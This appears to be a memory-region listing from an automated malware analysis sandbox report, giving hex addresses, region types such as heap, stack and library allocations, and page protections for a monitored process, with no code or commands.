heap
page read and write
7FFA5B56A000
unkown
page read and write
5BEC000
unkown
page read and write
5F8A000
heap
page read and write
2EEF000
unkown
page read and write
EDD2000
unkown
page read and write
7FFA5BD67000
unkown
page readonly
A0C7000
heap
page read and write
A149000
heap
page read and write
85F6000
heap
page read and write
5BEC000
unkown
page read and write
9AFA000
stack
page read and write
2818956A000
trusted library allocation
page read and write
7FF9F15EC000
trusted library allocation
page read and write
C9BE000
unkown
page readonly
A127000
heap
page read and write
D59D000
heap
page read and write
6103000
heap
page read and write
5898000
heap
page read and write
CA72000
unkown
page readonly
CA38000
stack
page read and write
E80000
heap
page read and write
12FC7B95000
heap
page read and write
26AC1B13000
heap
page read and write
A149000
heap
page read and write
4F8B9FE000
stack
page read and write
33A0000
unkown
page readonly
7FF511A5A000
unkown
page readonly
D1F5000
unkown
page readonly
A149000
heap
page read and write
28239408000
trusted library allocation
page read and write
554000
heap
page read and write
112B000
heap
page read and write
83A0000
heap
page read and write
60FC000
heap
page read and write
1C7C7451000
trusted library allocation
page read and write
607C000
heap
page read and write
2F4C000
heap
page read and write
18D5432E000
heap
page read and write
D00000
remote allocation
page read and write
23395022000
heap
page read and write
12FE0910000
trusted library allocation
page read and write
26AC109D000
heap
page read and write
28239632000
trusted library allocation
page read and write
7DF45EE31000
trusted library allocation
page execute read
5982000
heap
page read and write
5190000
unkown
page read and write
2ED8000
stack
page read and write
F52007A000
stack
page read and write
A1C3000
heap
page read and write
DF8A000
heap
page read and write
312B000
heap
page read and write
2060DE00000
trusted library allocation
page read and write
103F1000
heap
page read and write
7FF9F18C0000
trusted library allocation
page read and write
30DF000
stack
page read and write
138B000
heap
page read and write
7F6C000
stack
page read and write
D510000
trusted library allocation
page read and write
69EF000
stack
page read and write
7FF5114A7000
unkown
page readonly
48D0000
unkown
page read and write
E16A000
unkown
page read and write
7FFA5BCFE000
unkown
page read and write
10D8E000
stack
page read and write
2D8E000
stack
page read and write
FFCE000
heap
page read and write
4730000
trusted library section
page read and write
5802000
heap
page read and write
7727000
system
page read and write
28236EE0000
trusted library allocation
page read and write
12FE01B0000
trusted library allocation
page read and write
7FF511310000
unkown
page readonly
D145000
unkown
page readonly
5198000
unkown
page read and write
CE9F000
unkown
page readonly
7FF511A4D000
unkown
page readonly
D1A5000
unkown
page readonly
59B2000
heap
page read and write
DF74000
heap
page read and write
57DB000
heap
page read and write
8467000
heap
page read and write
282517A0000
trusted library allocation
page read and write
9F04000
heap
page read and write
7FF5114B9000
unkown
page readonly
103E6000
heap
page read and write
7FF5112DA000
unkown
page readonly
A1DF000
heap
page read and write
7310000
trusted library allocation
page read and write
D50000
heap
page read and write
88F7000
system
page read and write
20626076000
heap
page read and write
7FF5119DA000
unkown
page readonly
7FF9F1810000
trusted library allocation
page read and write
B3CA000
stack
page read and write
FFCE000
heap
page read and write
2062602D000
heap
page read and write
4CF0000
unkown
page read and write
7FF511788000
unkown
page readonly
5907000
heap
page read and write
BE0000
unkown
page read and write
A19B000
heap
page read and write
598A000
heap
page read and write
28187440000
heap
page read and write
E30000
heap
page read and write
86A1000
heap
page read and write
3030000
unkown
page read and write
2DAF000
stack
page read and write
282517D0000
trusted library allocation
page read and write
EED4000
unkown
page read and write
DA80000
heap
page read and write
4740000
unkown
page read and write
8603000
heap
page read and write
6087000
heap
page read and write
48A1000
unkown
page read and write
5BBE000
unkown
page read and write
C7B8000
stack
page read and write
154FC7E000
stack
page read and write
E59C000
stack
page read and write
7FF9F17A0000
trusted library allocation
page execute and read and write
4E85000
stack
page read and write
A53D000
stack
page read and write
A1CE000
heap
page read and write
7FF5112BB000
unkown
page readonly
7FFA5BCFD000
unkown
page write copy
8575000
heap
page read and write
A1A9000
heap
page read and write
281A202C000
heap
page read and write
12FE087F000
trusted library allocation
page read and write
8525000
heap
page read and write
A09F000
heap
page read and write
18D54310000
heap
page read and write
11D0000
unkown
page readonly
7AD4000
unkown
page readonly
1562944B000
heap
page read and write
4880000
trusted library allocation
page read and write
7FF51152D000
unkown
page readonly
12FE0180000
trusted library allocation
page read and write
4371B6C000
stack
page read and write
7FF51164B000
unkown
page readonly
ABBB000
stack
page read and write
1010000
unkown
page read and write
2016A025000
heap
page read and write
18D54FA0000
trusted library allocation
page read and write
337A000
stack
page read and write
7FF51186D000
unkown
page readonly
4BCC000
stack
page read and write
282518D0000
trusted library allocation
page read and write
A149000
heap
page read and write
103C4000
heap
page read and write
8590000
heap
page read and write
28187365000
heap
page read and write
3460000
heap
page read and write
5320000
unkown
page read and write
7FF51185A000
unkown
page readonly
9F7D000
heap
page read and write
86AB000
heap
page read and write
8590000
heap
page read and write
26AC1057000
heap
page read and write
A53D000
stack
page read and write
7FF9F1772000
trusted library allocation
page read and write
FF0000
remote allocation
page read and write
7FF511930000
unkown
page readonly
28238F00000
trusted library allocation
page read and write
7FF5116B7000
unkown
page readonly
F90000
trusted library section
page readonly
5C64000
unkown
page read and write
60A5000
heap
page read and write
103C8000
heap
page read and write
A094000
heap
page read and write
28238A35000
heap
page read and write
E558000
unkown
page read and write
7FF9F1785000
trusted library allocation
page read and write
10B8C000
stack
page read and write
C83F000
stack
page read and write
5DCE000
stack
page read and write
471A000
unkown
page read and write
D4A3000
trusted library allocation
page read and write
9F7D000
heap
page read and write
2F9F000
unkown
page read and write
9F04000
heap
page read and write
281894C5000
trusted library allocation
page read and write
78AD000
unkown
page readonly
20626230000
trusted library allocation
page read and write
E59C000
stack
page read and write
1430000
unkown
page readonly
48D0000
unkown
page read and write
2060E5FB000
trusted library allocation
page read and write
7FFA5B56A000
unkown
page read and write
5978000
heap
page read and write
E30000
heap
page read and write
7FF51154E000
unkown
page readonly
2CCE67E000
stack
page read and write
8619000
heap
page read and write
20169F30000
trusted library allocation
page read and write
10468000
heap
page read and write
6084000
heap
page read and write
FF93000
heap
page read and write
FF91000
heap
page read and write
9F75000
heap
page read and write
49A5000
heap
page read and write
85E4000
heap
page read and write
12FE0181000
trusted library allocation
page read and write
9E85000
heap
page read and write
3260000
trusted library allocation
page read and write
7FFA5B570000
unkown
page read and write
4F8B8F7000
stack
page read and write
12FE01B0000
trusted library allocation
page read and write
7E82000
unkown
page read and write
7FF9F15E0000
trusted library allocation
page read and write
7483000
trusted library allocation
page read and write
588C000
heap
page read and write
282389E0000
trusted library allocation
page read and write
1C7AF000000
heap
page execute and read and write
6995000
unkown
page read and write
3270000
trusted library allocation
page read and write
8389000
heap
page read and write
7FF9F16E0000
trusted library allocation
page execute and read and write
7FFA5BB61000
unkown
page execute read
5985000
heap
page read and write
7FF5114C6000
unkown
page readonly
85E4000
heap
page read and write
7FF5115B5000
unkown
page readonly
7FF511590000
unkown
page readonly
5389000
stack
page read and write
967D000
stack
page read and write
7FFA5954F000
unkown
page readonly
28248F70000
trusted library allocation
page read and write
A1BF000
heap
page read and write
540E000
stack
page read and write
7FF511685000
unkown
page readonly
7460000
trusted library allocation
page read and write
1A563432000
heap
page read and write
103EE000
heap
page read and write
10A82000
heap
page read and write
2F82000
heap
page read and write
58C2000
heap
page read and write
1A56346D000
heap
page read and write
4B23000
heap
page read and write
A014000
heap
page read and write
2FDF000
stack
page read and write
7FF511486000
unkown
page readonly
31CC000
heap
page read and write
281A1FF0000
heap
page read and write
A4B9000
stack
page read and write
723FBFE000
stack
page read and write
8575000
heap
page read and write
7FF9F18D0000
trusted library allocation
page read and write
7FF511959000
unkown
page readonly
7320000
trusted library allocation
page read and write
2843000
heap
page read and write
E89B000
unkown
page read and write
5B78000
stack
page read and write
4D30000
unkown
page read and write
52B4000
unkown
page read and write
3059000
stack
page read and write
59A0000
heap
page read and write
28251090000
trusted library allocation
page read and write
There are 6758 hidden memdumps, click here to show them.